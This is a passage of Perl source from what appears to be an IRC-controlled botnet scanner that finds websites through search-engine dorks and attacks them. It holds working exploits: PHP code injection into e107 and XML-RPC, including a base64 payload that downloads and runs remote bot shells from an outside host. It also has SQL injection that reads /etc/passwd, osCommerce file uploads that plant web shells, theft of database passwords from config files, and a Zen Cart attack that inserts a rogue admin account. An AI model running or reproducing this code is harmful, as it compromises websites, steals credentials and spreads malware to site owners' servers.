my $code = $_[1];
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code
."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $res = $ua->request($req);
return $res->content;

}
sub e107_spread_query() {
my $url = $_[0];
my $code = "ZWNobyAiZVhwQ3JFdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxi
cj4iOw0KJGNtZD0iZWNobyBub2IwZHlDckV3O2NkIC90bXA7cm0gLXJmIGRvci4qICoudHh0Lio7ZmV0
Y2ggaHR0cDovL2N0cm94LmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAxMS9pc28udHh0O3BlcmwgaXNv
LnR4dDtybSAtcmYgaXNvLnR4dDt3Z2V0IGh0dHA6Ly9jdHJveC5jb20vd3AtY29udGVudC91cGxvYWRz
LzIwMTEvaXNvLnR4dDtwZXJsIGlzby50eHQ7cm0gLXJmIGlzby50eHQ7Y3VybCAtTyBodHRwOi8vY3Ry
b3guY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDExL2lzby50eHQ7cGVybCBpc28udHh0O3JtIC1yZiBp
c28udHh0O2x3cC1kb3dubG9hZCBodHRwOi8vY3Ryb3guY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDEx
L2lzby50eHQ7cGVybCBpc28udHh0O2NkIC92YXIvdG1wO3JtIC1yZiBkb3IuKiAqLnR4dC4qO2ZldGNo
IGh0dHA6Ly9jdHJveC5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTEvaXNvLnR4dDtwZXJsIGlzby50
eHQ7cm0gLXJmIGlzby50eHQ7d2dldCBodHRwOi8vY3Ryb3guY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8y
MDExL2lzby50eHQ7cGVybCBpc28udHh0O3JtIC1yZiBpc28udHh0O2N1cmwgLU8gaHR0cDovL2N0cm94
LmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAxMS9pc28udHh0O3BlcmwgaXNvLnR4dDtybSAtcmYgaXNv
LnR4dDtsd3AtZG93bmxvYWQgaHR0cDovL2N0cm94LmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAxMS9p
c28udHh0O3BlcmwgaXNvLnR4dDsiOw0KJGVzZWd1aWNtZD1leCgkY21kKTtlY2hvICRlc2VndWljbWQ7
DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVu
Y3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIs
JHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBz
aGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9i
X3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9l
bmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0
YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2Vu
ZF9jbGVhbigpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygncG9wZW4nKSl7DQokZiA9IEBwb3Bl
bigkY2ZlLCJyIik7DQp3aGlsZSghQGZlb2YoJGNmZSkpIHsgJHJlcyAuPSBAZnJlYWQoJGNmZSwxMDI0
KTsgfQ0KQHBjbG9zZSgkZik7DQp9fQ0KcmV0dXJuICRyZXM7DQp9";
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$
code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $res = $ua->request($req);
}
sub xml() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$xmllogo(4@3$engine15)10 Scan fini
sh"); }
my $test = "http://".$site.$bug;
my $vuln = "http://".$site."13".$bug;
my $html = &get_content($test);
if ($html =~ /faultCode/ ) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; }
else {
my $resp = &xml_cek_query($test);
if ($resp =~ /j13mb0t(.*)j13mb0t/s) {
&xml_spread_query($test);sleep(2);
my $sys = $1;

my $check = &get_content("http://".$site."real.php");
&get_content("http://".$site."nazi.php");
&get_content("http://".$site."gnet.php");
if ($check =~ /ipays - exploit/) {
&msg("$chan","$xmllogo(4@3$engine15)15(13@9SHeLL15)13 ht
tp://".$site."7cyber.php 3".$sys);&get_content("http://".$site."nazi.php");
&msg("$admin","$xmllogo(4@3$engine15)15(13@9SHeLL15)13 h
ttp://".$site."7cyber.php 3".$sys);&get_content("http://".$site."nazi.php");
sleep(2);}
else {
&msg("$chan","$xmllogo(4@3$engine15)15(4@9SysTem15)7 ".$
vuln." 3".$sys); sleep(2);}
}
sleep(2); } exit; } }
}
}
}
sub xml_cek_query() {
my $url
= $_[0];
my $code = "system('uname -a');";
my $ua = LWP::UserAgent->new(agent => 'perl post');
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name></value>
</param></params></methodCall>";
$ua->timeout(7);
my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content =>
$exploit);
return $res->content;
}
sub xml_spread_query() {
my $xmltargt = $_[0];
my $xmlsprd = "system('wget ".$injector." -O images.php;fetch ".$injector.";mv
darwin.jpg cyber.php;wget ".$botshell." -O sign.php;fetch ".$botshell.";mv cache
d.jpg sign.php;wget ".$botshell2." -O cron.php;fetch ".$botshell2.";mv cached.jp
g cron.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$
botshell.";php cached.jpg;rm -rf cached.jpg;wget ".$botshell.";php cached.jpg;rm
-rf cached.jpg;curl -O ".$botshell.";php cached.jpg;rm -rf cached.jpg;lwp-downl
oad ".$botshell.";php cached.jpg;fetch ".$botshell2.";php cached.jpg;rm -rf cach
ed.jpg;wget ".$botshell2.";php cached.jpg;rm -rf cached.jpg;curl -O ".$botshell2
.";php cached.jpg;rm -rf cached.jpg;lwp-download ".$botshell2.";php cached.jpg;c
d /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php cached.jpg;rm -rf cached
.jpg;wget ".$botshell.";php cached.jpg;rm -rf cached.jpg;curl -O ".$botshell.";p
hp cached.jpg;rm -rf cached.jpg;lwp-download ".$botshell.";php cached.jpg;fetch
".$botshell2.";php cached.jpg;rm -rf cached.jpg;wget ".$botshell2.";php cached.j
pg;rm -rf cached.jpg;curl -O ".$botshell2.";php cached.jpg;rm -rf cached.jpg;lwp
-download ".$botshell2.";php cached.jpg;');";
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></pa
ram></params></methodCall>";
$userAgent->timeout(7);
$userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content
=> $exploit);
}

sub sql() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$sqllogo(4@3$engine15)10 Scan fini
sh"); }
my $test = "http://".$site.$bug."'";
my $vuln = "http://".$site."4".$bug;
my $sqlsite = "http://".$site.$bug;
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (for
k) { exit; } else {
if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/
Query failed/i || $html =~ m/SQL query failed/i ) {
&sqlbrute($sqlsite,$chan,$engine);}
elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed qu
otation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
&msg("$chan","$sqllogo(4@3$engine15)15(4@9MsSQL15)13 ".$vuln);}
elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Micros
oft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
&msg("$chan","$sqllogo(4@3$engine15)15(4@9MsAccess15)13 ".$vuln);}
elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $h
tml =~ m/mysql_fetch_array/i ) {
&sqlbrute($sqlsite,$chan,$engine);}
} exit; sleep(2); }
}
}
}
sub sqlbrute() {
my $situs=$_[0];
my $chan =$_[1];
my $engine=$_[2];
my $columns=20;
my $cfin.="--";
my $cmn.= "+";
for ($column = 0 ; $column < $columns ; $column ++)
{
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
{
$inyection = '';
$union = '';
}
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$iny
ection.$cfin;
$response=get($sql);
if($response =~ /loginpwnz/)
{
$column ++;
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
&msg("$chan","$sqllogo(4@3$engine15)15(4@9SQL15)13 $sql ");

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a"
.$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql)or die("[-] Impossible to get Information_Schema\n")
;
if($response =~ /loginpwnz/)
{
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn
."from".$cmn."information_schema.tables".$cfin;
&msg("$chan","$sqllogo(4@3$engine15)15(4@9SQL15)(4@13INFO_SCHEMA15
)13 $sql ");
}
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a"
.$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
{
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn
."from".$cmn."mysql.user".$cfin;
&msg("$chan","$sqllogo(4@3$engine15)15(4@9SQL15)(4@13USER15)13 $sql
");
}
else
{
}
while ($loadcont < $column-1)
{
$loadfile.=','.'load_file(0x2f6574632f706173737764)';
$loadcont++;
}
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f65746
32f706173737764)".$loadfile.$cfin;
$response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
if($response =~ /root:x:/)
{
&msg("$chan","$sqllogo(4@3$engine15)15(4@9SQL15)(4@13Load File15)13
$sql ");
}
else
{
}
foreach $tabla(@tabele)
{
chomp($tabla);
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e
70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to ge
t tables\n");
if($response =~ /loginpwnz/)
{
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.
$cmn."from".$cmn.$tabla.$cfin;
&msg("$chan","$sqllogo(4@3$engine15)15(4@9SQL15
)(4@13Tabel15)13 $sql ");
&tabelka($situs,$tabla,$chan,$engine);
}
}
}
}
}

sub tabelka() {
my $situs =$_[0];
my $tabla =$_[1];
my $chan =$_[2];
my $engine=$_[3];
my $cfin.="--";
my $cmn.= "+";
chomp($tabla);
foreach $columna(@kolumny)
{
chomp($columna);
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f6769
6e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to get columns\n");
if ($response =~ /loginpwnz/)
{
&msg("$chan","$sqllogo(4@3$engine15)15(4@3SQL15)(4@13SQLi
Vuln15)9 $situs 14(4@13Kolom14)13 $columna 14(4@13Tabel14)13 $tabla ");
}
}
}
sub osco() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
#
if ($count == $num-1) { &msg("$chan","$oscologo(4@3$engine15)10 Scan fi
nish"); }
my $test = "http://".$site.$bug;
my $test1 = "http://".$site."admin/file_manager.php/login.php";
my $test2 = "http://".$site."admin/banner_manager.php/login.php";
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (for
k) { exit; } else {
if ($html =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/ ) {
#
&msg("$chan","$oscologo(4@3$engine15)15(4@3System15)7 ".$test);
&osco_xpl($test,$chan,$site,$engine);
&osco2($test1,$chan,$bug,$dork,$engine);
&osco_xpl3($test2,$chan,$site,$engine);
} else { }
} exit; sleep(2); }
}
}
}
sub osco_xpl() {
my $browser = LWP::UserAgent->new;
my $url
= $_[0]."?cPath=&action=new_product_preview";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $res = $browser->post( $url,['products_image' => ['./darwin.jpg' => 'cyber.ph

p' => 'application/octet-stream']],'Content-Type' => 'form-data');


my $resa = $browser->post( $url,['products_image' => ['./redhat.jpg' => 'picture
.inc.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resb = $browser->post( $url,['products_image' => ['./cached.jpg' => 'sign.ph
p' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resc = $browser->post( $url,['products_image' => ['./cached.jpg' => 'cron.ph
p' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resd = $browser->post( $url,['products_image' => ['./table.jpg' => 'mysql_du
mper.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
my $hasil4 = $resd->as_string;
my $check = &get_content("http://".$site."images/cyber.php");&get_conten
t("http://".$site."images/sign.php");&get_content("http://".$site."images/output
t.php");&get_content("http://".$site."images/mysql_dumper.php");sleep(3);
if ($check =~ /ipays - exploit/) {
my $safe ="";
my $os
="";
my $free ="";
if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
&msg("$chan","$oscologo(4@3$engine15)15(4@3SHeLL15)13 http://".$site."images/4cyb
er.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$chan ","$oscologo(4@3$engine15)15(4@3MYSQL15)15 http://".$site."images/my
sql_dumper.php");sleep(2);
&msg("$admin","$oscologo(4@3$engine15)15(4@3SHeLL15)13 http://".$site."images/4cy
ber.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}
}
sub osco2() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$oscologo(4@3$engine15)10 Scan fin
ish"); }
my $test = "http://".$site.$bug;
my $test1 = "http://".$site."admin/banner_manager.php/login.php";
my $test2 = "http://".$site."admin/categories.php/login.php";
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (for
k) { exit; } else {
if ($html =~ /TABLE_HEADING_FILENAME/) {
&msg("$chan","$oscologo(4@3$engine15)15(4@3System15)0 ".$test);
&osco_xpl2($test,$chan,$site,$engine);
&osco_xpl3($test1,$chan,$site,$engine);
&osco_xpl($test2,$chan,$site,$engine);
} else { }
} exit; sleep(2); }

}
}
}
sub osco_xpl2() {
my $browser = LWP::UserAgent->new;
my $url
= $_[0]."?action=processuploads";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $res = $browser->post( $url,['file_1' => ['./darwin.jpg' => 'cyber.php' => 'a
pplication/octet-stream']],'Content-Type' => 'form-data');
my $resa = $browser->post( $url,['file_1' => ['./redhat.jpg' => 'picture.inc.php
' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resb = $browser->post( $url,['file_1' => ['./cached.jpg' => 'sign.php' => 'a
pplication/octet-stream']],'Content-Type' => 'form-data');
my $resc = $browser->post( $url,['file_1' => ['./cached.jpg' => 'cron.php' => 'a
pplication/octet-stream']],'Content-Type' => 'form-data');
my $resd = $browser->post( $url,['file_1' => ['./table.jpg' => 'mysql_dumper.php
' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
my $hasil4 = $resd->as_string;
my $check = &get_content("http://".$site."images/cyber.php");&get_conten
t("http://".$site."images/sign.php");&get_content("http://".$site."images/cron.p
hp");&get_content("http://".$site."images/mysql_dumper.php");sleep(3);
if ($check =~ /ipays - exploit/) {
my $safe ="";
my $os
="";
my $free ="";
if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
&msg("$chan","$oscologo(4@3$engine15)15(4@3SHeLL15)13 http://".$site."images/4cyb
er.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$chan","$oscologo(4@3$engine15)15(4@3MYSQL15)15 http://".$site."images/mys
ql_dumper.php");sleep(2);
&msg("$admin","$oscologo(4@3$engine15)15(4@3SHeLL15)13 http://".$site."images/4cy
ber.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}
}
sub osco3() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
#
if ($count == $num-1) { &msg("$chan","$oscologo(4@3$engine15)10 Scan fi
nish"); }
my $test = "http://".$site.$bug;
my $test1 = "http://".$site."admin/file_manager.php/login.php";

my $test2 = "http://".$site."admin/categories.php/login.php";
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (for
k) { exit; } else {
if ($html =~ /TABLE_HEADING_BANNERS/) {
#
&msg("$chan","$oscologo(4@3$engine15)15(4@9System15)7 ".$test);
&osco_xpl3($test,$chan,$site,$engine);
&osco_xpl2($test1,$chan,$site,$engine);
&osco_xpl($test2,$chan,$site,$engine);
} else { }
} exit; sleep(2); }
}
}
}
sub osco_xpl3() {
my $browser = LWP::UserAgent->new;
my $url
= $_[0]."?action=insert";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $res = $browser->post( $url,['banners_image' => ['./darwin.jpg' => 'cyber.php
' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resa = $browser->post( $url,['banners_image' => ['./redhat.jpg' => 'picture.
inc.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resb = $browser->post( $url,['banners_image' => ['./cached.jpg' => 'sign.php
' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resc = $browser->post( $url,['banners_image' => ['./cached.jpg' => 'cron.php
' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resd = $browser->post( $url,['banners_image' => ['./table.jpg' => 'mysql_dum
per.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
my $hasil4 = $resd->as_string;
my $check = &get_content("http://".$site."images/cyber.php");&get_conten
t("http://".$site."images/sign.php");&get_content("http://".$site."images/cron.p
hp");&get_content("http://".$site."images/mysql_dumper.php");sleep(3);
if ($check =~ /ipays - exploit/) {
my $safe ="";
my $os
="";
my $free ="";
if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
&msg("$chan","$oscologo(4@3$engine15)15(4@3SHeLLx15)13 http://".$site."images/4cy
ber.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$chan","$oscologo(4@3$engine15)15(4@3MYSQL15)15 http://".$site."images/mys
ql_dumper.php");sleep(2);
&msg("$admin","$oscologo(4@3$engine15)15(4@3SHeLLx15)13 http://".$site."images/4p
icture.inc.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}
}
sub osql() {
my $chan = $_[0];
my $site = $_[1];
my $engine = $_[2];
my $test = "http://".$site."admin/file_manager.php/login.php?action=downlo
ad&filename=/includes/configure.php";

my $re = &get_content($test);
if ($re =~ /http:\/\//){
&osql_xpl($test,$chan,$site);
}
}
sub osql_xpl() {
my $url
= $_[0];
my $chan = $_[1];
my $site = $_[2];
my $request = HTTP::Request->new(GET=>$url);
my $browser = LWP::UserAgent->new();
$browser->timeout(10);
my $response = $browser->request($request);
if ($response->is_success) {
my $res = $response->as_string;
if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
&msg("$chan","$ossqllogo(4@3VULN)15 http://".$site." 14[+]DIR path: 4 $1");
&msg("$admin-","$ossqllogo(4@3VULN)15 http://".$site." 14[+]DIR path: 4 $1");
}
if ($res =~ m/'DB_SERVER', '(.*)'/g) {
&msg("$chan","$ossqllogo(4@3VULN)15 http://".$site." 14[+]DB Server: 4 $1");
&msg("$admin-","$ossqllogo(4@3VULN)15 http://".$site." 14[+]DB Server: 4 $1")
;
}
if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
&msg("$chan","$ossqllogo(4@3VULN)15 http://".$site." 14[+]DB username: 4 $1")
;
&msg("$admin-","$ossqllogo(4@3VULN)15 http://".$site." 14[+]DB username: 4 $1
");
}
if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
&msg("$chan","$ossqllogo(4@3VULN)15 http://".$site." 14[+]DB password: 4 $1")
;
&msg("$admin-","$ossqllogo(4@3VULN)15 http://".$site." 14[+]DB password: 4 $1
");
}
if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
&msg("$chan","$ossqllogo(4@3VULN)15 http://".$site." 14[+]DB database: 4 $1")
;
&msg("$admin-","$ossqllogo(4@3VULN)15 http://".$site." 14[+]DB database: 4 $1
");
}
}
}
sub oscoQ() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$ossqllogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$ossqllogo(4@3$engine15)10 Scan fi
nish"); }
my $test = "http://".$site."admin/file_manager.php/login.php?action=

download&filename=/includes/configure.php";
my $re = &get_content($test);
if ($re =~ /http:\/\//){
&osql_xpl($test,$chan,$site);
}
}
}
}
sub e107xpl1() {
my $chan = $_[0];
my $site = $_[1];
my $engine = $_[2];
my $test = "http://".$site."e107_plugins/my_gallery/image.php?file=../../e
107_config.php";
my $re = &get_content($test);
if ($re =~ /http:\/\//){
&osql_xpl($test,$chan,$site);
}
}
sub e107xpl() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$e107logosql);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$e107logosql(4@3$engine15)10 Scan
finish"); }
my $test = "http://".$site."e107_plugins/my_gallery/image.php?file=.
./../e107_config.php";
my $re = &get_content($test);
if ($re =~ /http:\/\//){
#
&msg("$chan","$e107logosql(4@3$engine15)15(4@9System15)7 ".$test);
&e107_cuk($test,$chan,$site);
}
}
}
}
sub e107_cuk() {
my $url
= $_[0];
my $chan = $_[1];
my $site = $_[2];
my $request = HTTP::Request->new(GET=>$url);
my $browser = LWP::UserAgent->new();
$browser->timeout(10);
my $response = $browser->request($request);
if ($response->is_success) {
my $res = $response->as_string;
if ($res =~ m/mySQLserver
= '(.*)'/g) {
&msg("$chan","$e107logosql (4@3VULN)15 http://".$site." 14[+]DB Server: 4 $1"
);
}
if ($res =~ m/mySQLuser
= '(.*)'/g) {
&msg("$chan","$e107logosql (4@3VULN)15 http://".$site." 14[+]DB username: 4 $

1");
}
if ($res =~ m/mySQLpassword = '(.*)'/g) {
&msg("$chan","$e107logosql (4@3VULN)15 http://".$site." 14[+]DB password: 4 $
1");
}
if ($res =~ m/mySQLdefaultdb = '(.*)'/g) {
&msg("$chan","$e107logosql (4@3VULN)15 http://".$site." 14[+]DB database: 4 $
1");
}
}
}
sub adm() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$admlogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$admlogo(4@8$engine15)10 Scan fini
sh"); }
my $test = "http://".$site."phpMyAdmin/config/config.inc.php?c=id";
my $vuln = "http://".$site."phpMyAdmin/config/config.inc.php?c=";
my $re = &get_content($test);
if ($re =~ /$adm_output/){
&msg("$chan", "$admlogo(4@8$engine15)(4@13VulN15)13 ".$vuln."15(4@0OKE15)");
}
}
}
}
sub op() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$oplogo(4@8$engine15)10 Scan finis
h"); }
my $test = "http://".$site.$open_test;
my $vuln = "http://".$site."admin/view/javascript/fckeditor/editor/f
ilemanager/connectors/test.html";
my $re = &get_content($test);
if ($re =~ /$open_output/){
&msg("$chan", "$oplogo(4@8$engine15)(4@13VulN15)13 ".$vuln."15(4@0UPLOAD15)");
}
}
}
}
sub zen() {

my
my
my
my
my
my
my
if

$chan = $_[0];
$bug = $_[1];
$dork = $_[2];
$engine = $_[3];
$count = 0;
@list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
$num = scalar(@list);
($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$zenlogo(4@8$engine15)10 Scan fini
sh"); }
my $test = "http://".$site."admin/sqlpatch.php/password_forgotten.p
hp?action=execute";
my $html = &get_content($test);
if ($html =~ /zc_install/){
&zen_query($chan,$site,$test);
}
}
}
}
sub zen_query() {
my $chan = $_[0];
my $url = $_[1];
my $test = $_[2];
my $code = "INSERT+INTO+admin+%28admin_id%2C+admin_name%2C+admin_email%2C+a
dmin_pass%29+VALUES+%28621%2C+%27localhost%27%2C+%27susudada16%40gmail.com%27%2C
+%274d5254218ec0c9edd5d05ce549399c53%3Abe%27%29%3B";
my $req = HTTP::Request->new(POST => $test);
$req->content_type("application/x-www-form-urlencoded");
$req->content("query_string=".$code);
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(3);
my $res = $ua->request($req);
my $data = $res->as_string;
if ( $data =~ /1 statements processed/i ) {
&msg("$chan","$zenlogo(4@9VulN15)8 http://".$url."4admin/login.php 15(4@9user15)0 ipays
15(4@9pass15)0 admin");
&msg("$admin","$zenlogo(4@9VulN15)8 http://".$url."4admin/login.php 15(4@9user15)0 ipay
s 15(4@9pass15)0 admin");
}
elsif ( $data =~ /Duplicate entry/ ) {
&msg("$chan","$zenlogo(4@9SuCcEs15)12 http://".$url."3admin/login.php 15(4@9user15)10 i
pays 15(4@9pass15)10 admin");
&msg("$admin","$zenlogo(4@9SuCcEs15)12 http://".$url."3admin/login.php 15(4@9user15)10
ipays 15(4@9pass15)10 admin");
}
}
sub search_engine() {
my (@total,@clean);
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $logo = $_[4];
if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google)
; }
if ($engine eq "ReDiff") { my @rediff = &rediff($dork); push(@total,@rediff)
; }

if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }


if ($engine eq "ALtaViSTa") { my @altavista = &altavista($dork); push(@total
,@altavista); }
